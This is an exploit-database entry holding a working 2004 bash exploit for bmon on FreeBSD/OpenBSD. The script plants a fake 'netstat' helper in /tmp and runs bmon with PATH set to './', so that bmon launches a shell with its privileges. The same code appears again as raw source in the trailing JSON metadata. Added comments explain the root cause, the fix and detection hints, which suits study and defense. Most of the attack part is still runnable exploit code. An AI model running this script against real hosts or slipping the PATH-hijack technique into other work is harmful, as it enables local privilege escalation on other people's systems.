ID EXPLOITPACK:07A52EFCC26DE24FD919EA8CEC9E9169 Type exploitpack Reporter Idan Nahoum Modified 2004-10-16T00:00:00
Description
BSD bmon 1.2.1_2 - Local acls Bypass
#!/usr/local/bin/bash
# Written by Idan Nahoum. idanna@bk.ru
# Local proof-of-concept for FreeBSD/OpenBSD with bmon < 1.2.1_2 installed.
#
# Root cause: when bmon is executed with the -n parameter it popen()s a helper
# program but fails to provide an absolute path, so the helper is resolved
# through the PATH of whoever started bmon.
# NOTE(review): the original comment names the helper "netcat", but the file
# this script writes below is called "netstat"; netstat is presumably the name
# bmon really looks up -- confirm against the advisory linked below.
#
# Some BSDs are configured with ACLs that don't allow setuid files to run
# except those that are explicitly allowed, so creating a helper that chmod's
# +s bash wouldn't work; the shell has to be run directly by bmon. bmon uses
# ncurses, so to get a usable shell stdout is redirected to stderr (stdout is
# closed) and the stty settings are restored.
# http://www.vuxml.org/freebsd/938f357c-16dd-11d9-bc4a-000c41e2cdad.html
#
# Defender notes:
#  - Host fix: upgrade bmon to 1.2.1_2 or later (the header above lists the
#    versions below that as affected); see the advisory for the exact change.
#  - Code fix for this bug class: a privileged program should spawn helpers by
#    absolute path, set a fixed PATH itself, and not hold elevated privileges
#    across popen()/system().
#  - Detection: executables named after system utilities appearing in /tmp,
#    and bmon being started with a PATH made of relative entries such as "./".
#
# Keep the caller's original PATH; it is written into the helper file below.
declare -r SPATH="${PATH}"
# Record where stty lives and the current terminal settings (stty -g) so the
# helper can put the terminal back after bmon's ncurses UI has changed it.
declare -r STTY_EXEC=$(which stty)
declare -r STTY_SETTINGS=$(${STTY_EXEC} -g)
# NOTE(review): QSHELL is declared but never referenced in this script.
declare -r QSHELL="/usr/local/bin/bash"
# Default bmon location; replaced by the first argument when one is given.
declare BMON_EXEC="/usr/local/sbin/bmon"
# The usage line is printed on every run, not only on error.
echo "$0 <path to bmon> [default: ${BMON_EXEC}]"
[ "$#" -gt "0" ] && BMON_EXEC="${1}"
# Stop if the target is not an executable file. The bare `exit` returns the
# status of the preceding echo, so this failure path still exits with 0.
[ -x "${BMON_EXEC}" ] ||
{
echo "${BMON_EXEC} not found"
exit
}
# The helper file is created relative to /tmp; the result of cd is not checked.
cd /tmp
# apparently bmon closes stdout, so we run a shell with stdout redirected
# to stderr.
# The here-document delimiter is unquoted, so ${STTY_EXEC}, ${STTY_SETTINGS}
# and ${SPATH} are expanded now, while the file is written, not when it runs.
# The file is written without a #! line.
cat > ./netstat <<EOF
${STTY_EXEC} ${STTY_SETTINGS}
PATH=${SPATH} /bin/sh 1>&2
EOF
/bin/chmod 755 ./netstat
echo "trying to exploit"
# PATH is overridden for this one command only, so a bare-name lookup made by
# bmon resolves to the file created above in the current directory.
PATH=./ "${BMON_EXEC}" -n
# milw0rm.com [2004-10-16]
{"lastseen": "2020-04-01T19:04:05", "references": [], "description": "\nBSD bmon 1.2.1_2 - Local acls Bypass", "edition": 1, "reporter": "Idan Nahoum", "exploitpack": {"type": "local", "platform": "bsd"}, "published": "2004-10-16T00:00:00", "title": "BSD bmon 1.2.1_2 - Local acls Bypass", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2004-10-16T00:00:00", "id": "EXPLOITPACK:07A52EFCC26DE24FD919EA8CEC9E9169", "href": "", "viewCount": 2, "sourceData": "#!/usr/local/bin/bash\n\n# Written by Idan Nahoum. idanna@bk.ru\n# local exploit for FreeBSD/OpenBSD with bmon < 1.2.1_2 installed.\n# when bmon is executed with the -n parameter it popen()s netcat\n# but fail to provide an absoluth path.\n# some bsds are configured with acls that doesnt allow setuid files to \n# run except those that are explicity allowed, so creating a file called \n# netcat that chmod's +s bash wouldnt work, bash needs to run directly by\n# bmon which uses ncurses, so to get a useable shell we need to redirect\n# stdout to stderr (stdout is closed), and restore the stty settings.\n# http://www.vuxml.org/freebsd/938f357c-16dd-11d9-bc4a-000c41e2cdad.html\n\ndeclare -r SPATH=\"${PATH}\"\ndeclare -r STTY_EXEC=$(which stty)\ndeclare -r STTY_SETTINGS=$(${STTY_EXEC} -g) \ndeclare -r QSHELL=\"/usr/local/bin/bash\"\ndeclare BMON_EXEC=\"/usr/local/sbin/bmon\"\n\necho \"$0 <path to bmon> [default: ${BMON_EXEC}]\"\n\n[ \"$#\" -gt \"0\" ] && BMON_EXEC=\"${1}\"\n\n[ -x \"${BMON_EXEC}\" ] || \n{\necho \"${BMON_EXEC} not found\"\nexit\n}\n\ncd /tmp\n\n# apparently bmon closes stdout, so we run a shell with stdout redirected \n# to stderr.\n\ncat > ./netstat <<EOF\n${STTY_EXEC} ${STTY_SETTINGS}\nPATH=${SPATH} /bin/sh 1>&2\nEOF\n\n/bin/chmod 755 ./netstat\necho \"trying to exploit\"\nPATH=./ \"${BMON_EXEC}\" -n \n\n# milw0rm.com 
[2004-10-16]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645829258}}